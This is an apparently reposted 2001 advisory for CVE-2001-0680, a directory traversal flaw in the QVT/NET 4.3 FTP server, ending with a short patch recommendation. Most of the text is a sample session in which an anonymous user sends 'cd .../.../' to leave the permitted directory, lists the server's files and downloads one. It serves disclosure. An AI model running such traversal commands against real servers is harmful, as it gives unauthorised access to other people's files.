# CVE-2001-0680 Web目錄遍歷漏洞
==INFO==
====================================================================== QVT/NET 4.3 FTP server Directory Traversal Author: alt3kx!Date: 2001-05-22 Site: www.raza-mexicana.org Greet to: _0x90_, dr_fdisk^, Dex, PaTa Teams: Raregazz - X-ploit and S0d vicente F0x no rulas wey! ====================================================================== ------------------------=[Brief Description]=------------------------- QVT/NET FTP Server is an FTP server for Windows 9x/NT/2000. A bug allows any user to change to any directory and see files to PATH also GET files remotely. ----------------------------=[Plataforms]=------------------------------- Windows 9.x Windows NT windows 2000 -----------------------------=[Summary]=--------------------------------- When sending the command "CWD ..." (or "cd ..." in the default FTP client), the server will go one directory up. EXploit: C:\>ftp server.vulnerable.com Connected to server.vulnerable.com. 220 shell FTP server (QVT/Net 4.3) ready. User (server.vulnerable.com:(none)): anonymous 331 Guest login OK, please send real ident as password. Password: 230 Guest login OK, access restrictions apply. ftp> cd .. 501 CWD command not allowed. SO THE BUG... ... ftp>cd .../.../.../.../.../.../ 250 CWD command successful. ftp> dir 200 PORT command successful. 150 Opened data connection for 'ls' (server.vulnerable.com,1105) (0 bytes). -rwxrwxrwx 1 nobody system 246928 Jan 18 13:10 nc.exe drwxrwxrwx 1 nobody system 0 Jan 18 15:39 Netscape 6 drwxrwxrwx 1 nobody system 0 Jan 18 14:50 Netscape 6 Setup -rwxrwxrwx 1 nobody system 3209110 Jan 19 10:51 icq.exe -rwxrwxrwx 1 nobody system 6330449 Jan 19 12:01 porn.exe drwxrwxrwx 1 nobody system 0 Jan 18 17:44 norton drwxrwxrwx 1 nobody system 0 Jan 19 11:14 Program Files drwxrwxrwx 1 nobody system 0 Jan 19 12:04 plugins . . . . -rwxrwxrwx 1 nobody system 0 May 4 13:05 hacksites.txt drwxrwxrwx 1 nobody system 0 May 4 16:51 XXXX drwxrwxrwx 1 nobody system 0 May 8 13:17 teens drwxrwxrwx 1 nobody system 0 May 8 13:18 tmp -rwxrwxrwx 1 nobody system 168 May 21 19:07 raza-alt3kx.txt 226 Transfer complete. ftp: 7707 bytes received in 0.35Seconds 21.96Kbytes/sec. ftp> get raza-alt3kx.txt 200 PORT command successful. 150 ASCII data connection for raza-alt3kx.txt (server.vulnerable.com,1106) (168 bytes). 226 Transfer complete. ftp: 168 bytes received in 0.02Seconds 8.40Kbytes/sec. ftp>quit 221 Goodbye. C:\>type raza-alt3kx.txt Bug discovered by alt3kx! C:\> -------------------------------=[Patch]=--------------------------------- The recomended action is to changue the persmissions or define individual directory for users anonymous with files no compromise. -------------------------=[Company Compromise]=-------------------------- Company: http//www.qpc.com
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容